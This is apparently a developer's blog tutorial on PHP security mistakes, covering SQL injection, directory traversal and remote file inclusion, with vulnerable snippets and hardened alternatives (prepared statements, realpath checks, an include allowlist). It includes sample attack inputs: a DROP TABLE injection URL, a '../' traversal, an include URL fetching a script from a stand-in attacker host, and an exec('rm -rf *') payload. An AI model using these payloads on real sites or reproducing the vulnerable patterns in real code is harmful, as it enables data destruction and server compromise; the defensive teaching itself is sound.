About a year and a half ago, I started coding my CMS, Jasmine. It combined my experience with several CMSs like the nukes, e107, Joomla and Jupiter (which I was sad to see close a few months ago). I was (and maybe still am in a way) an inexperienced PHP coder, still trying to find my way around. So, naturally, I fell for two of the most serious coding errors: SQL injection and remote file inclusion. Here, I will try to explain in short what happened and how to avoid it.
SQL Injection:
Here is a real life scenario. You want to get the contents of a page according to a GET variable. Let’s say you want to retrieve the news item named in a URI like this: yoursite.com/news.php?item=2
So, you will make a query like this:
mysql_query('SELECT body FROM news_items WHERE id='.$_GET['item']);
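If, by seeing this, you think “so where is the catch”, when finished reading this go back to your code and check it all up 🙂 The above query looks fine but it can be exploited by anybody. Let’s say the link is not like the one above but like this: “yoursite.com/news.php?item=-1;DROP%20TABLE%20news_items;”. Now this is a problem, because the string that is passed to mysql_query will actually be the concatenation of the query string we already have in our code plus the string that is in the GET. One caveat: mysql_query only sends a single statement, so this particular DROP would fail there, but database APIs that accept several statements at once would run it. And even with mysql_query, the same hole lets an attacker append something like “-1 UNION SELECT ...” and read data from other tables.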
This situation is avoidable. You need to do what is called “sanitising”, meaning that you have to make sure that the variable in the GET is what you expect it to be. Here, you expect it to be a number, so you should do the following:
mysql_query('SELECT body FROM news_items WHERE id='.intval($_GET['item']));
By passing the argument to the function intval you actually make sure it is an integer. There is also floatval if you expect the parameter to be a float. So far so good. But what if what we expect is a string, let’s say a search string? Here is the way we should deal with that situation:
mysql_query('SELECT title FROM news_items WHERE title LIKE "%'.mysql_real_escape_string($_GET['search']).'%"');
The function mysql_real_escape_string places a “\” before the characters that are special inside a quoted SQL string, such as “ and ‘ (and also the backslash itself, NUL and newlines). It does not touch “;”, and it does not need to: as long as the value sits inside the quotes, anything malicious added to your GET stays plain text and is not executed as part of the query. That also means it only protects values that you actually put inside quotes.
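The mysql_* functions used above were removed in PHP 7, so on a current setup the same idea is usually expressed with prepared statements. Here is a minimal sketch of that, assuming a PDO connection is available. The names $pdo, find_news_body and search_news_titles are made up for illustration; only the news_items table and its columns come from the examples above.

```php
<?php
// Sketch only: find_news_body() and search_news_titles() are hypothetical
// helper names; $pdo is assumed to be an already connected PDO object.

// Fetch one news body by id. The id is validated first and then bound as
// a parameter, so it never becomes part of the SQL text.
function find_news_body(PDO $pdo, $rawId)
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null; // not an integer: reject it instead of guessing
    }
    $stmt = $pdo->prepare('SELECT body FROM news_items WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $body = $stmt->fetchColumn();
    return $body === false ? null : $body; // false means "no such row"
}

// Search titles. The user's text is bound as data; the % wildcards are
// added here in PHP, not by the visitor inside the SQL string.
function search_news_titles(PDO $pdo, $search)
{
    $stmt = $pdo->prepare('SELECT title FROM news_items WHERE title LIKE :pattern');
    $stmt->bindValue(':pattern', '%' . $search . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}
```

You would call these with the raw GET values, for example find_news_body($pdo, $_GET['item']). Unlike intval, which quietly turns “-1;DROP...” into -1, the filter_var check rejects anything that is not a clean integer. A “%” or “_” typed by the visitor still acts as a LIKE wildcard here, which is harmless for injection but may matter for your search results.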
Remote File Inclusion:
This is another dangerous scenario that can cause a lot of trouble. Let’s say you are developing a simple PHP file explorer, which gets the path from the URI, opens it and lists the files it contains. So, the URI would be something like “yoursite.com/explorer.php?path=photos/”. In your code you would do something like:
// Vulnerable on purpose: the path comes straight from the URI
$dir = opendir('/some/path/'.$_GET['path']);
// Compare with false so that a file named "0" does not end the loop
while(false !== ($file = readdir($dir))){
echo $file;
}
closedir($dir);
With this code you will get all the contents of the folder “/some/path/photos/”. But here is a dangerous situation too. Let’s say the URI is not like the one above but like this: “yoursite.com/explorer.php?path=../”. This way you will get the contents of the folder “/some/path/../”, which actually is “/some/”. Busted. An attacker can browse every folder that the user running Apache has read access to (this trick is usually called directory traversal). And if the script is more complicated, let’s say it echoes the contents of the file given as a parameter, things are even worse: the whole world can read any file on the server that this user can read. To solve this you need to make a good and thorough check on your variable.
But what the term “Remote file inclusion” really refers to is even worse than all the above. Let’s say you have a modular script that loads a file given in the URI. Suppose you have the following: “yoursite.com/include.php?file=foo.php”. In your modular script you would have something like:
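One possible shape for such a check, as a minimal sketch: resolve the requested path with realpath and accept it only if the result is still inside the folder you meant to expose. The helper name resolve_inside is made up for illustration, and “/some/path” is just the folder from the example above.

```php
<?php
// Sketch only: resolve_inside() is a hypothetical helper name.

// Return the real path of $base/$userPath, or null when that path does
// not exist or ends up outside $base (for example through "../").
function resolve_inside($base, $userPath)
{
    $realBase = realpath($base);
    $realTarget = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($realBase === false || $realTarget === false) {
        return null; // base or target does not exist
    }
    // The trailing separator stops "/some/path-other" from matching "/some/path".
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($realTarget === $realBase || strpos($realTarget, $prefix) === 0) {
        return $realTarget; // the base itself or something below it
    }
    return null;
}
```

In the explorer you would call resolve_inside('/some/path', $_GET['path']) and only pass the result to opendir when it is not null. With “photos/” you get “/some/path/photos” back, while “../” resolves to “/some” and is rejected.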
include($_GET['file']);
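Ouch! Houston, you have a problem :). An attacker could do the following: “yoursite.com/include.php?file=http://attackersite.com/exploitscript.txt”. On a server where PHP is allowed to include URLs (newer PHP versions control this with the allow_url_include setting), that file is fetched and run as part of your script. In there, he could add PHP commands like: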
exec('rm -rf *');
To avoid all the above you need to check your variables very, very carefully. Use functions like realpath to determine the path to be included and compare it to what you expect.
One thing I want to point out: throughout the article I used GET variables. This does not mean that POST is safe. As you know, POST is just a very big GET that can also be faked. Techniques using the HTTP protocol can do that. For more details read the article I wrote, “HTTP for hardcores or… masochists!“.
If you have any pointers I’d love to hear about them, so leave a comment 😉
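For the include case, “compare it to what you expect” can be as simple as a fixed list of allowed files. A minimal sketch of that idea follows. The function resolve_module, the $modules list and the modules/ folder are all made up for illustration; only the “file” parameter and “foo.php” come from the example above.

```php
<?php
// Sketch only: resolve_module(), $modules and the modules/ folder are
// hypothetical names used for illustration.

// Look the requested value up in a fixed list. Only exact keys match, so
// URLs, "../" tricks and anything else unexpected simply find nothing.
function resolve_module($requested, array $allowed)
{
    if (is_string($requested) && isset($allowed[$requested])) {
        return $allowed[$requested];
    }
    return null;
}

// The values we accept in ?file=... and the local files they stand for.
$modules = array(
    'foo.php'  => __DIR__ . '/modules/foo.php',
    'news.php' => __DIR__ . '/modules/news.php',
);

$file = resolve_module(isset($_GET['file']) ? $_GET['file'] : null, $modules);
if ($file !== null && is_file($file)) {
    include $file; // the path comes from our own list, never from the visitor
}
```

The visitor’s input is only ever used as a lookup key here, so “file=http://attackersite.com/exploitscript.txt” matches nothing and nothing is included.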